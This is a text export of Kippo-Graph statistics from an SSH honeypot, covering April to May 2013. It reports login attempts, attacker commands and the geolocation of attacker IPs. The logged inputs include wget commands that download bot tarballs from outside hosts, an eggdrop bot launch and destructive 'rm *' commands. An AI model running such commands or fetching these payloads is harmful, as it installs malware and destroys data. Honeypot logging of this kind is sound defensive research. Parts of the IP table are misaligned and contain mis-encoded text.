SSH Honeypot statistics 31-05-2013

Page 1

Source website: bruteforce.gr/kippo-graph

Overall honeypot activity Total login attempts

24596

Distinct source IP addresses

268

Active time period Start date (first attack) Tuesday, 09-Apr-2013, 20:22 PM

End date (last attack) Friday, 31-May-2013, 18:07 PM

Graphical statistics generated from your Kippo honeypot database

Top 10 passwords This vertical bar chart diplays the top 10 passwords that attackers try when attacking the system.

Top 10 usernames This vertical bar chart diplays the top 10 usernames that attackers try when attacking the system.

Top 10 user-pass combos This vertical bar chart diplays the top 10 username and password combinations that attackers try when attacking the system.


This pie chart diplays the top 10 username and password combinations that attackers try when attacking the system.

Success ratio This vertical bar chart diplays the overall attack success ratio for the particular honeypot system.

Successes per day/week This vertical bar chart diplays the most successful break-ins per day (Top 20) for the particular honeypot system. The numbers indicate how many times correct credentials were given by attackers.


This line chart diplays the daily successes on the honeypot system. Spikes indicate successful entries over a weekly period. Warning: Dates with zero successes are not displayed.

This line chart diplays the weekly successes on the honeypot system. Curves indicate successful entries over a weekly period.

Connections per IP This vertical bar chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.


This pie chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.

Successful logins from the same IP This vertical bar chart diplays the number of successful logins from the same IP address (Top 20). The numbers indicate how many times the particular source opened a successful session.

Probes per day/week This horizontal bar chart diplays the most probes per day (Top 20) against the honeypot system.


This line chart diplays the daily activity on the honeypot system. Spikes indicate hacking attempts. Warning: Dates with zero probes are not displayed.

This line chart diplays the weekly activity on the honeypot system. Curves indicate hacking attempts over a weekly period.

Top 10 SSH clients This vertical bar chart diplays the top 10 SSH clients used by attackers during their hacking attempts.


Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph

Thanks to OS Templates


Source website: bruteforce.gr/kippo-graph

Input presentation and statistics gathered from the honeypot system Overall post-compromise activity Post-compromise human activity Total number of commands 197

Distinct number of commands 111 Downloaded files

Total number of downloads 3

Distinct number of downloads 3

Human activity inside the honeypot The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.

The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation. Warning: Dates with zero input are not displayed.

The following line chart visualizes real human activity per week, by counting the number of input to the system for each day of operation.


Top 10 input (overall) The following table diplays the top 10 commands (overall) entered by attackers in the honeypot system. ID

Input

Count

1

ls

29

2

cd ..

12

3

exit

9

4

ls -l

6

5

ifconfig

6

6

w

4

7

ls -a

3

8

poweroff -h

3

9

poweroff

3

10

top

3

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.

Top 10 successful input The following table diplays the top 10 successful commands entered by attackers in the honeypot system. ID

Input (success)

Count

1

ls

29

2

cd ..

12

3

exit

9

4

ls -l

6

5

ifconfig

6

6

w

4

7

ls -a

3

8

mkdir TEST

2

9

cd richard/

2


10

rm *

2

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.

Top 10 failed input The following table diplays the top 10 failed commands entered by attackers in the honeypot system. ID

Input (fail)

Count

1

poweroff -h

3

2

poweroff

3

3

top

3

4

dir

3

5

help

2

6

sudo rmdir *

2

7

locate

2

8

test

1

9

halt -h

1

10

halt -n

1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.

passwd commands The following table diplays the latest "passwd" commands entered by attackers in the honeypot system. ID

Timestamp

Input

1

Saturday, 11-May-2013, 23:43 PM

h2ckt3ch

2

Wednesday, 24-Apr-2013, 09:11 AM

tst

3

Wednesday, 24-Apr-2013, 09:11 AM

test

wget commands


The following table diplays the latest "wget" commands entered by attackers in the honeypot system. ID

Input

File link

NoVirusThanks

1

wget http://kaoftp.webs.com/random.tgz

http://anonym.to/?http://kaoftp.webs.com/random.tgz

Scan File

2

wget arhivemusu.webs.com/boti.tgz

http://anonym.to/?http://arhivemusu.webs.com/boti.tgz

Scan File

3

wget rom.do.am/enou.tgz

http://anonym.to/?http://rom.do.am/enou.tgz

Scan File

Executed scripts The following table diplays the latest executed scripts by attackers in the honeypot system. ID

Timestamp

Input

1

Tuesday, 28-May-2013, 10:47 AM

./rand

2

Tuesday, 28-May-2013, 10:46 AM

./linux

3

Monday, 06-May-2013, 17:06 PM

./eggdrop-1.6.17 -m bot1.conf

Interesting commands The following table diplays other interesting commands executed by attackers in the honeypot system. ID

Timestamp

Input

1

Friday, 17-May-2013, 20:19 PM

locate

2

Monday, 06-May-2013, 17:06 PM

cat /proc/cpuinfo

3

Wednesday, 01-May-2013, 12:16 PM

cat /etc/issue

4

Wednesday, 24-Apr-2013, 20:26 PM

ifconfig

apt-get commands The following table diplays the latest "apt-get"/"aptitude" commands entered by attackers in the honeypot system. ID 1

Timestamp Tuesday, 28-May-2013, 10:46 AM

Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph

Input apt-get install libgnome.so*

Thanks to OS Templates


Source website: bruteforce.gr/kippo-graph

Geolocation information gathered from the IP addresses probing the Kippo SSH Honeypot The following table displays the top 10 IP addresses connected to the system (ordered by volume of connections). ID

IP Address

Probes

City

1

93.63.201.220

5258

Rome

2

103.23.100.173

4268

3

69.28.57.87

4021

4

37.140.248.6

1136

5

117.135.241.112

840

Beijing

6

1.25.202.50

580

Baotou

7

60.191.220.106

527

8

220.161.148.178

517

9

190.0.17.43

484

10

5.178.87.121

422

11

202.102.111.179

383

Nanjing

12

195.5.231.154

340

13

173.208.210.111

14

Region

Code

Latitude

Longitude

Hostname

Italy

IT

41.900002

12.4833

smtp.sinfarma.it

Indonesia

ID

-5

120

173.subnet-103.23.100.host.unnes.ac.id

United States

US

33.978199

-117.903999

69.28.57.87

Jordan

JO

31

36

37.140.248.6

Beijing

China

CN

39.928902

116.388298

117.135.241.112

Nei Mongol

China

CN

40.652199

109.822197

1.25.202.50

China

CN

35

105

60.191.220.106

Fujian

China

CN

24.987801

118.498299

220.161.148.178

Antioquia

Colombia

CO

6.2518

-75.563599

Wimax-Cali-190-0-17-43.orbitel.net.co

Russian Federation

RU

60

100

5.178.87.121

Jiangsu

China

CN

32.061699

118.777802

202.102.111.179

Paris

テ四e-deFrance

France

FR

48.866699

2.3333

promotrans-41100-231-154.cnt.nerim.net

317

Kansas City

MO

United States

US

39.1068

-94.566002

173.208.210.111

218.237.65.47

284

Seocho

Seoul

Korea, Republic of

KR

37.490601

127.019997

218.237.65.47

15

108.174.151.58

275

Denver

CO

United States

US

39.705502

-104.9664

108-174-151-58.worldwidewebhosting.com

16

58.225.75.228

262

Seoul

Seoul

Korea, Republic of

KR

37.598499

126.978302

58.225.75.228

Rowland Heights

Putian

Latium

Country Name

CA

Lookup


17

37.153.99.247

262

Netherlands

NL

52.5

5.75

37.153.99.247

18

79.172.10.78

257

Yekaterinburg Sverdlovsk

Russian Federation

RU

56.851898

60.612202

79.172.10.78.ural.ru

19

42.121.56.31

165

Hangzhou

Zhejiang

China

CN

30.2936

120.1614

42.121.56.31

20

88.190.44.131

147

Paris

Île-deFrance

France

FR

48.866699

2.3333

88-190-44-131.rev.dedibox.fr

21

96.245.89.25

142

Media

PA

United States

US

39.9193

-75.418999

static-96-245-89-25.phlapa.fios.verizon.net

22

92.86.121.113

128

Bucharest

Bucureşti

Romania

RO

44.4333

26.1

adsl92-86-121-113.romtelecom.net

23

62.193.248.117

122

Amen

ProvenceAlpes-Côte d'Azur

France

FR

44.048302

6.8698

wpc4027.amenworld.com

24

173.44.236.68

97

Henderson

NV

United States

US

36.0312

-115.073898

173.44.236.68

25

121.254.224.145

96

Seoul

Seoul

Korea, Republic of

KR

37.598499

126.978302

121.254.224.145

26

176.99.6.220

90

Russian Federation

RU

60

100

1103.globatel.ru

27

61.156.238.56

90

Jinan

Shandong

China

CN

36.668301

116.9972

61.156.238.56

28

211.157.167.70

88

Beijing

Beijing

China

CN

39.928902

116.388298

211.157.167.70

29

218.200.177.234 84

Chengdu

Sichuan

China

CN

30.6667

104.066704

218.200.177.234

30

61.236.64.56

84

Beijing

Beijing

China

CN

39.928902

116.388298

61.236.64.56

31

1.255.3.116

77

Australia

AU

-27

133

1.255.3.116

32

119.161.208.2

76

Beijing

Beijing

China

CN

39.928902

116.388298

119.161.208.2

33

60.10.203.18

73

Hebei

Hebei

China

CN

39.889702

115.275002

60.10.203.18

34

216.19.223.55

71

Phoenix

AZ

United States

US

33.508301

-112.071701

216.19.223.55


35

50.65.33.201

66

Fort Saint John

BC

Canada

CA

56.25

-120.833298

S01060016b68e7ddd.nb.shawcable.net

36

37.247.104.243

60

Sanayi

Antalya Province

Turkey

TR

36.903099

30.6991

host-37-247-104-243.routergate.com

37

180.96.23.74

60

Nanjing

Jiangsu

China

CN

32.061699

118.777802

180.96.23.74

38

124.160.194.27

59

Hangzhou

Zhejiang

China

CN

30.2936

120.1614

124.160.194.27

39

96.45.168.34

58

Canyon Country

CA

United States

US

34.406502

-118.401497

34.168.45.96-dedicated.multacom.com

40

200.195.189.10

57

Faxinal

Paranรก

Brazil

BR

-23.983299 -51.366699

10.189.195.200.static.copel.net

41

211.154.163.149

57

Beijing

Beijing

China

CN

39.928902

116.388298

211.154.163.149

42

220.128.241.128 52

T'ai-wan

Taiwan

TW

24.9869

121.305603

vcs.mediland.com.tw

43

124.92.127.194

51

Shenyang

Liaoning Province

China

CN

41.792198

123.4328

124.92.127.194

44

58.248.38.108

50

Guangzhou

Guangdong

China

CN

23.116699

113.25

58.248.38.108

45

122.72.120.105

49

Beijing

Beijing

China

CN

39.928902

116.388298

122.72.120.105

46

202.136.60.142

48

China

CN

35

105

202.136.60.142

47

121.199.13.242

47

China

CN

39.928902

116.388298

121.199.13.242

48

89.232.120.181

45

Russian Federation

RU

60

100

181.120.232.89.in-addr.arpa

49

213.85.133.6

43

Russian Federation

RU

60

100

213.85.133.6

50

58.211.18.206

42

China

CN

32.061699

118.777802

58.211.18.206

51

202.85.213.179

42

China

CN

35

105

202.85.213.179

52

46.21.161.37

41

Netherlands

NL

52.5

5.75

no-record-set.rijndata.nl

53

117.79.91.214

40

China

CN

39.928902

116.388298

117.79.91.214

Beijing

Nanjing

Beijing

Beijing

Jiangsu

Beijing


54

221.176.185.229

37

Xinyang

55

200.222.101.118

37

56

189.3.61.50

36

Caxias

57

202.100.221.46

36

58

211.215.22.210

59

Henan

China

CN

32.095798

114.1203

221.176.185.229

Brazil

BR

-10

-55

mailz.riodasostras.rj.gov.br

Maranh達o

Brazil

BR

-4.8333

-43.349998

189.3.61.50

Haikou

Hainan Province

China

CN

20.045799

110.341698

202.100.221.46

35

Seoul

Seoul

Korea, Republic of

KR

37.598499

126.978302

211.215.22.210

60.168.158.18

33

Hefei

Anhui

China

CN

31.863899

117.2808

60.168.158.18

60

122.72.120.115

33

Beijing

Beijing

China

CN

39.928902

116.388298

122.72.120.115

61

223.82.244.22

32

Beijing

Beijing

China

CN

39.928902

116.388298

223.82.244.22

62

94.242.252.47

31

Luxembourg LU

49.75

6.1667

ip-static-94-242-252-47.as5577.net

63

211.103.158.64

30

Beijing

Beijing

China

CN

39.928902

116.388298

211.103.158.64

64

183.232.32.24

28

Beijing

Beijing

China

CN

39.928902

116.388298

183.232.32.24

65

118.102.181.4

28

Puri

Orissa

India

IN

19.799999

85.849998

abs-static-4.181.102.118.aircel.co.in

66

221.224.33.70

28

Suzhou

Jiangsu

China

CN

31.3041

120.595398

221.224.33.70

67

77.221.104.75

27

Jeddah

Makkah

Saudi Arabia

SA

21.516899

39.2192

77.221.104.75

68

177.135.154.60

26

S達o Paulo

Brazil

BR

-23.473301

-46.665798

multiplusfidelidade.static.gvt.net.br

69

183.60.20.36

26

Guangzhou

Guangdong

China

CN

23.116699

113.25

183.60.20.36

70

70.183.21.153

26

Santa Ana

CA

United States

US

33.745399

-117.891998

wsip-70-183-21-153.oc.oc.cox.net

71

87.204.185.4

26

Garwolin

Masovian Voivodeship

Poland

PL

51.8974

21.614401

87.204.185.4


72

182.160.96.42

25

Bangladesh

BD

24

90

pabx.aamranetworks.com

73

202.103.36.43

24

Wuhan

Hubei

China

CN

30.580099

114.273399

202.103.36.43

74

203.152.199.90

24

Sagamihara

Kanagawa

Japan

JP

35.553101

139.354401

203.152.199.90.static.zoot.jp

75

94.141.130.162

24

Bydgoszcz

KujawskoPomorskie Voivodship

Poland

PL

53.127102

18.02

162-host.alfa.pl

76

119.36.186.44

24

Wuhan

Hubei

China

CN

30.580099

114.273399

119.36.arpa.hb.cnc.cn

77

47.21.145.210

23

United States

US

38

-97

ool-2f1591d2.static.optonline.net

78

95.211.216.163

23

Amsterdam

North Holland

Netherlands

NL

52.349998

4.9167

95.211.216.163

79

42.120.22.86

23

Hangzhou

Zhejiang

China

CN

30.2936

120.1614

42.120.22.86

80

113.57.238.30

22

Wuhan

Hubei

China

CN

30.580099

114.273399

113.57.arpa.hb.cnc.cn

81

219.148.203.133

21

Shenyang

Liaoning Province

China

CN

41.792198

123.4328

219.148.203.133

82

83.212.123.79

21

Athens

AttikĂ­

Greece

GR

37.983299

23.733299

snf-50727.vm.okeanos.grnet.gr

83

109.200.13.138

19

United Kingdom

GB

51.5

-0.13

138-13-200-109.rackcentre.redstation.net.uk

84

91.232.208.36

19

Ukraine

UA

49

32

91.232.208.36

85

109.70.149.222

19

United Kingdom

GB

51.5

-0.13

222-149-109.gamingdeluxe.co.uk

86

209.92.176.41

18

United States

US

40.6152

-75.543701

reverse.in-addr.arpa

87

94.156.12.144

18

Bulgaria

BG

43

25

94.156.12.144

88

195.60.212.206

17

Netherlands

NL

52.5

5.75

195.60.212.206

89

81.23.20.8

15

Kiev

Misto Kyyiv

Ukraine

UA

50.4333

30.516701

81-23-20-8-vpn.gprs.kyivstar.net

90

112.148.184.26

15

Seoul

Seoul

Korea,

KR

37.598499

126.978302

112.148.184.26

Allentown

PA


90

112.148.184.26

15

Seoul

Seoul

Korea, Republic of

KR

37.598499

126.978302

112.148.184.26

91

174.142.53.50

15

Montreal

QC

Canada

CA

45.5

-73.583298

mail.rayara.com

92

203.34.37.37

15

Mongolia

MN

46

105

203.34.37.37

93

223.82.244.19

14

China

CN

39.928902

116.388298

223.82.244.19

94

217.118.19.138

14

Germany

DE

51

9

loft8491.serverloft.de

95

210.77.16.234

13

China

CN

39.928902

116.388298

210.77.16.234

96

145.253.72.3

13

Germany

DE

51

9

145.253.72.3

97

211.95.76.242

12

Beijing

Beijing

China

CN

39.928902

116.388298

211.95.76.242

98

189.26.255.11

12

Salvador

Bahia

Brazil

BR

-12.9833

-38.516701

189.26.255.11.static.gvt.net.br

99

94.142.155.123

12

Iceland

IS

65

-18

94.142.155.123

100

183.221.253.134

12

China

CN

39.928902

116.388298

183.221.253.134

101

118.175.3.220

12

Thailand

TH

15

100

118-175-3-220.totisp.net

102

59.175.148.95

11

Wuhan

Hubei

China

CN

30.580099

114.273399

95.148.175.59.broad.wh.hb.dynamic.163data.com.cn

103

114.66.192.70

11

Beijing

Beijing

China

CN

39.928902

116.388298

114.66.192.70

104

122.72.120.107

10

Beijing

Beijing

China

CN

39.928902

116.388298

122.72.120.107

105

85.26.31.60

10

04

Belgium

BE

50.633301

5.3833

85.26.31.60

106

190.197.57.29

10

Belize

BZ

17.25

-88.75

btl-new-ip-29.btl.net

107

46.108.6.54

10

Bucharest

BucureĹ&#x;ti

Romania

RO

44.4333

26.1

asociatia-aj.adnettelecom.ro

108

198.211.104.85

10

New York

NY

United States

US

40.7267

-73.9981

198.211.104.85

Beijing

Beijing

Beijing

Beijing

Beijing

Beijing


109

213.149.117.244

10

Montenegro

ME

42

19

infofest2.244.crnagora.net

110

196.41.208.194

9

Springs

Gauteng

South Africa

ZA

-26.25

28.4

mail.pdna.co.za

111

106.3.242.126

9

Beijing

Beijing

China

CN

39.928902

116.388298

106.3.242.126

112

61.142.106.34

9

Zhongshan

Guangdong

China

CN

21.322599

110.582901

61.142.106.34

113

61.234.146.22

9

Beijing

Beijing

China

CN

39.928902

116.388298

61.234.146.22

114

61.155.177.58

9

Nanjing

Jiangsu

China

CN

32.061699

118.777802

61.155.177.58

115

50.57.144.86

8

San Antonio

TX

United States

US

29.488899

-98.398697

50-57-144-86.static.cloud-ips.com

116

220.248.83.20

8

Shanghai

Shanghai

China

CN

31.045601

121.399696

220.248.83.20

117

67.205.68.105

8

Montreal

QC

Canada

CA

45.5

-73.583298

67.205.68.105

118

121.8.154.28

8

Guangzhou

Guangdong

China

CN

23.116699

113.25

121.8.154.28

119

173.193.198.197

8

Dallas

TX

United States

US

32.929901

-96.835297

173.193.198.197-static.reverse.softlayer.com

120

123.30.173.96

8

Ho Chi Minh City

Hồ Chí Minh

Vietnam

VN

10.8142

106.643799

static.vdc.vn

121

218.25.129.123

7

Dalian

Liaoning Province

China

CN

38.912201

121.602203

218.25.129.123

122

202.112.112.236

7

Beijing

Beijing

China

CN

39.928902

116.388298

202.112.112.236

123

113.107.101.219

7

Guangzhou

Guangdong

China

CN

23.116699

113.25

113.107.101.219

124

178.172.235.46

7

Belarus

BY

53

28

178-172-235-46.hoster.by

125

192.187.98.45

6

0

0

192.187.98.45

126

50.115.166.46

6

39.1068

-94.566002

50.115.166.46

Kansas City

MO

United States

US


127

60.220.225.214

6

128

46.165.236.153

129

Changzhi

China

CN

36.045799

113.044197

214.225.220.60.adsl-pool.sx.cn

6

Germany

DE

51

9

46.165.236.153

178.20.227.231

6

Turkey

TR

39

35

178.20.227.231.salay.com.tr

130

178.63.126.9

6

Germany

DE

51

9

12173-1.serverpool.net

131

182.18.30.81

6

China

CN

39.928902

116.388298

182.18.30.81

132

203.231.233.18

5

Korea, Republic of

KR

37

127.5

203.231.233.18

133

62.217.127.90

5

Greece

GR

39

22

helpdesk.vm.aspete.gr

134

198.7.63.53

5

Manassas

VA

United States

US

38.793201

-77.536598

198.7.63.53

135

218.59.215.185

5

Jinan

Shandong

China

CN

36.668301

116.9972

218.59.215.185

136

112.133.204.60

5

India

IN

20

77

112.133.204.60

137

61.155.169.211

4

Nanjing

Jiangsu

China

CN

32.061699

118.777802

61.155.169.211

138

59.53.94.9

4

Nanchang

Jiangxi

China

CN

28.549999

115.933296

59.53.94.9

139

122.72.82.81

4

Beijing

Beijing

China

CN

39.928902

116.388298

122.72.82.81

140

219.138.203.198 4

Ezhou

Hubei

China

CN

30.396099

114.886497

219.138.203.198

141

24.43.123.80

4

Joshua Tree

CA

United States

US

34.157799

-116.273201

rrcs-24-43-123-80.west.biz.rr.com

142

185.19.93.203

4

Sanayi

Antalya Province

Turkey

TR

36.903099

30.6991

host-185-19-93-203.ttnetdc.com

143

221.192.143.73

4

Hebei

Hebei

China

CN

39.889702

115.275002

221.192.143.73

144

222.34.19.247

3

Beijing

Beijing

China

CN

39.928902

116.388298

222.34.19.247

145

118.145.25.104

3

Beijing

Beijing

China

CN

39.928902

116.388298

118.145.25.104

Beijing

Shanxi

Beijing


146

204.185.46.18

3

Columbia

MO

United States

US

38.881699

-92.402

204.185.46.18

147

211.103.34.61

3

Beijing

Beijing

China

CN

39.928902

116.388298

211.103.34.61

148

150.165.15.175

3

Campina Grande

ParaĂ­ba

Brazil

BR

-7.2167

-35.883301

150.165.15.175

149

207.179.216.178

3

Eureka

IL

United States

US

40.7187

-89.253304

207-179-216-178.mtco.com

150

61.155.150.217

3

Nanjing

Jiangsu

China

CN

32.061699

118.777802

61.155.150.217

151

182.131.22.211

3

Chengdu

Sichuan

China

CN

30.6667

104.066704

182.131.22.211

152

202.109.251.85

3

Xiamen

Fujian

China

CN

24.479799

118.081902

202.109.251.85

153

2.238.127.234

3

Valenza

Piedmont

Italy

IT

45.016701

8.6333

2-238-127-234.ip244.fastwebnet.it

154

77.251.217.15

3

Weesp

North Holland

Netherlands

NL

52.307701

5.0397

dhcp-077-251-217-015.chello.nl

155

121.11.153.242

2

Guangzhou

Guangdong

China

CN

23.116699

113.25

121.11.153.242

156

201.217.4.104

2

San Lorenzo

Central

Paraguay

PY

-25.3333

-57.533298

201.217.4.104

157

195.81.183.28

2

Italy

IT

42.833302

12.8333

195.81.183.28

158

91.232.208.38

2

Ukraine

UA

49

32

91.232.208.38

159

173.243.112.249

2

Stafford

TX

United States

US

29.6283

-95.562401

ded4u.com

160

219.222.224.22

2

Guangzhou

Guangdong

China

CN

23.116699

113.25

219.222.224.22

161

188.225.190.57

2

Palestinian Territory

PS

32

35.25

188.225.190.57

162

71.248.125.231

2

United States

US

39.402

-76.632896

static-71-248-125-231.bltmmd.east.verizon.net

163

186.226.83.3

2

Brazil

BR

-10

-55

mail.g8.net.br

Towson

MD


164

183.60.130.99

2

Guangzhou

Guangdong

China

CN

23.116699

113.25

183.60.130.99

165

188.24.75.246

2

Cluj-napoca

Cluj

Romania

RO

46.766701

23.6

188-24-75-246.rdsnet.ro

166

182.118.23.141

2

Zhengzhou

Henan

China

CN

34.683601

113.532501

hn.kd.ny.adsl

167

31.169.68.28

2

Istanbul

Istanbul

Turkey

TR

41.0186

28.964701

ip28.subnet68.netfactor.net.tr

168

182.184.0.141

2

Islamabad

Islāmābād

Pakistan

PK

33.689999

73.055099

182.184.0.141

169

203.114.226.70

2

Indonesia

ID

-5

120

203.114.226.70

170

80.237.217.210

2

Germany

DE

51.650002

6.1833

ds80-237-217-210.dedicated.hosteurope.de

171

198.2.204.81

2

0

0

198.2.204.81

172

117.21.182.50

2

Nanchang

Jiangxi

China

CN

28.549999

115.933296

117.21.182.50

173

69.172.215.246

2

Los Angeles

CA

United States

US

34.0522

-118.243698

69.172.215.246

174

61.164.147.2

2

China

CN

35

105

61.164.147.2

175

152.104.213.5

2

Hong Kong

HK

22.25

114.166702

static-ip-5-213-104-152.anlai.com

176

202.85.209.50

2

China

CN

35

105

202.85.209.50

177

112.65.239.124

2

Shanghai

Shanghai

China

CN

31.045601

121.399696

112.65.239.124

178

174.142.61.133

2

Montreal

QC

Canada

CA

45.5

-73.583298

174.142.61.133

179

222.174.255.178

2

Jinan

Shandong

China

CN

36.668301

116.9972

222.174.255.178

180

219.144.17.74

2

Xian

Shaanxi

China

CN

34.258301

108.928596

219.144.17.74

181

219.129.21.4

2

Guangzhou

Guangdong

China

CN

23.116699

113.25

219.129.21.4

North RhineWestphalia


182

5.9.58.134

2

Germany

DE

51

9

moire.tinxp.com

183

103.23.125.25

2

India

IN

20

77

103.23.125.25

184

124.160.91.17

2

Hangzhou

Zhejiang

China

CN

30.2936

120.1614

124.160.91.17

185

183.61.142.131

2

Guangzhou

Guangdong

China

CN

23.116699

113.25

183.61.142.131

186

61.35.191.245

2

Seoul

Seoul

Korea, Republic of

KR

37.598499

126.978302

61.35.191.245

187

95.159.65.27

2

Goran

At Ta始m墨m

Iraq

IQ

35.573601

44.608898

95.159.65.27

188

218.104.145.140

2

China

CN

35

105

218.104.145.140

189

202.85.218.38

2

China

CN

35

105

202.85.218.38

190

178.19.108.253

2

Poland

PL

50.448502

18.8515

hosted-by.slaskdatacenter.pl

191

46.165.228.156

2

Germany

DE

51

9

hosted-by.leaseweb.com

192

211.90.12.9

2

Beijing

Beijing

China

CN

39.928902

116.388298

211.90.12.9

193

109.72.35.33

2

Deventer

Overijssel

Netherlands

NL

52.25

6.2

6d482321.ftth.concepts.nl

194

108.163.159.72

1

Lasalle

QC

Canada

CA

45.419998

-73.639999

108.163.159.72

195

111.4.124.11

1

Beijing

Beijing

China

CN

39.928902

116.388298

111.4.124.11

196

114.112.69.59

1

Beijing

Beijing

China

CN

39.928902

116.388298

114.112.69.59

197

174.34.145.74

1

Seattle

WA

United States

US

47.489101

-122.290802 174.34.145.74.rdns.ubiquity.io

198

69.39.136.12

1

Indianapolis

IN

United States

US

39.768398

-86.157997

12.136.39.69.static.egix.net

199

79.114.226.20

1

Satu Mare

Satu Mare

Romania

RO

47.799999

22.883301

79-114-226-20.rdsnet.ro

Silesian Voivodeship


200 83.103.192.41

1

201

125.46.5.42

1

202

91.193.121.90

1

203

122.70.132.30

1

204

46.165.221.166

1

205

186.46.93.75

1

206

178.18.26.145

1

207

61.167.199.232

1

Zhengzhou

Beijing

Quito

Harbin

Henan

Beijing

Pichincha

Romania

RO

46

25

isism3.ploiesti.astral.ro

China

CN

34.683601

113.532501

hn.kd.ny.adsl

Poland

PL

52

20

91.193.121.90

China

CN

39.928902

116.388298

122.70.132.30

Germany

DE

51

9

thoreau.guilhem.org

Ecuador

EC

-0.2167

-78.5

186.46.93.75

Netherlands

NL

52.5

5.75

178.18.26.145

CN

45.75

126.650002

61.167.199.232

Heilongjiang China

208 137.117.13.65

1

United States

US

38

-97

137.117.13.65

209

80.243.185.133

1

United Kingdom

GB

51.5

-0.13

133-185-243-80.rackcentre.redstation.net.uk

210

110.75.188.37

1

China

CN

30.2936

120.1614

UNKNOWN-110-75-188-37.aliyun.com

211

85.25.226.164

1

Germany

DE

51

9

mail.bitbeats.de

212

81.20.195.234

1

Russian Federation

RU

60

100

g-kondi.sc.ru

213

41.198.201.138

1

Nigeria

NG

6.4531

3.3958

41-198-201-138.iwayafrica.net

214

91.239.67.28

1

Poland

PL

52

20

91-239-67-28.greendata.pl

215

80.72.38.21

1

Poland

PL

52.1031

21.034401

selidor-host4.etop.pl

216

202.97.185.10

1

China

CN

35

105

202.97.185.10

217

121.199.29.116

1

China

CN

39.928902

116.388298

121.199.29.116

Hangzhou

Lagos

Jozefoslaw

Beijing

Zhejiang

Lagos

Masovian Voivodeship

Beijing


218

211.142.247.67

1

219

76.74.129.236

220

Xiangtan

China

CN

28.6411

111.7789

211.142.247.67

1

Canada

CA

60

-95

76.74.129.236

123.108.111.191

1

Hong Kong

HK

22.25

114.166702

hkhdc.laws.ms

221

82.117.205.6

1

Belgrade

Serbia (general)

Serbia

RS

44.8186

20.4681

82.117.205.6

222

198.211.116.18

1

New York

NY

United States

US

40.7267

-73.9981

198.211.116.18

223

184.105.148.176

1

Fremont

CA

United States

US

37.515499

-121.896202

184.105.148.176

224

80.115.223.60

1

Saratov

Saratov

Russian Federation

RU

51.5406

46.008598

oxota.ws

225

5.39.89.200

1

France

FR

46

2

ks3276722.kimsufi.com

226

82.137.15.47

1

Romania

RO

44.4333

26.1

82-137-15-47.rdsnet.ro

227

211.125.68.208

1

Japan

JP

36

138

dc.ptr21.public.gmocloud.com

228

94.231.128.45

1

Samara

Samara

Russian Federation

RU

53.183498

50.118198

45-128-231-94.broadband.telenettv.ru

229

109.112.51.87

1

Segrate

Lombardy

Italy

IT

45.483299

9.2833

109.112.51.87

230

103.246.246.65

1

Hong Kong

HK

22.25

114.166702

103.246.246.65

231

79.113.138.233

1

Romania

RO

45.700001

27.1833

79-113-138-233.rdsnet.ro

232

188.138.113.49

1

Germany

DE

51

9

zebra1028.server4you.net

233

31.3.245.178

1

United Kingdom

GB

51.5

-0.13

h31-3-245-178.host.redstation.co.uk

234

79.114.235.54

1

Satu Mare

Satu Mare

Romania

RO

47.799999

22.883301

79-114-235-54.rdsnet.ro

235

88.191.95.25

1

Paris

ĂŽle-deFrance

France

FR

48.866699

2.3333

sd-17427.dedibox.fr

Bucharest

Focsani

Hunan Province

BucureĹ&#x;ti

Vrancea


236

217.77.72.115

1

Libreville

Estuaire

Gabon

GA

0.3833

9.45

belinga.aninf.ga

237

211.154.149.106

1

Shenzhen

Guangdong

China

CN

22.5333

114.133301

211.154.149.106

238

219.95.24.110

1

Johor Bahru

Johor

Malaysia

MY

1.4655

103.757797

24.95.219.in-addr.arpa.static.tm.net.my

239

46.183.12.118

1

United Kingdom

GB

51.5

-0.13

46.183.12.118

240

198.148.101.62

1

Canyon Country

CA

United States

US

34.406502

-118.401497

62-101-148-198-dedicated.multacom.com

241

58.240.17.250

1

Nanjing

Jiangsu

China

CN

32.061699

118.777802

58.240.17.250

242

46.102.12.148

1

Ploiesti

Prahova

Romania

RO

44.950001

26.016701

46.102.12.148

243

121.14.117.119

1

Guangzhou

Guangdong

China

CN

23.116699

113.25

121.14.117.119

244

59.151.115.39

1

Beijing

Beijing

China

CN

39.928902

116.388298

59.151.115.39

245

122.49.48.70

1

Beijing

Beijing

China

CN

39.928902

116.388298

122.49.48.70

246

122.165.87.196

1

Chennai

Tamil NÄ du

India

IN

13.0833

80.283302

ABTS-TN-Static-196.87.165.122.airtelbroadband.in

247

88.191.160.75

1

Paris

ĂŽle-deFrance

France

FR

48.866699

2.3333

88-191-160-75.rev.dedibox.fr

248

111.1.54.160

1

Beijing

Beijing

China

CN

39.928902

116.388298

111.1.54.160

249

187.174.116.245

1

Jiutepec

Morelos

Mexico

MX

18.866699

-99.183296

ns1.revistaecos.net

250

61.146.164.35

1

Guangzhou

Guangdong

China

CN

23.116699

113.25

61.146.164.35

251

189.211.50.117

1

Mexico

The Federal District

Mexico

MX

19.4342

-99.138603

189-211-50-117.static.axtel.net

252

211.142.247.66

1

Xiangtan

Hunan Province

China

CN

28.6411

111.7789

211.142.247.66

253

113.6.247.171

1

Harbin

Heilongjiang China

CN

45.75

126.650002

113.6.247.171


254

37.159.78.108

1

Cesano Maderno

255

61.100.186.34

1

256

190.0.155.66

1

Montevideo

257

62.128.151.139

1

London

258

37.182.85.128

1

259

186.47.123.211

1

Quito

260

60.195.250.111

1

261

122.154.163.22

262

Lombardy

Italy

IT

45.633301

9.1333

37.159.78.108

Korea, Republic of

KR

37

127.5

61.100.186.34

Montevideo

Uruguay

UY

-34.858101

-56.170799

r190-0-155-66.ir-static.adinet.com.uy

London

United Kingdom

GB

51.514198

-0.0931

mail.managingmycopd.co.uk

Italy

IT

42.833302

12.8333

37.182.85.128

Pichincha

Ecuador

EC

-0.2167

-78.5

186.47.123.211

Beijing

Beijing

China

CN

39.928902

116.388298

60.195.250.111

1

Bangkok

Bangkok

Thailand

TH

13.754

100.501404

122.154.163.22

113.106.49.138

1

Shenzhen

Guangdong

China

CN

22.5333

114.133301

113.106.49.138

263

202.120.247.19

1

Shanghai

Shanghai

China

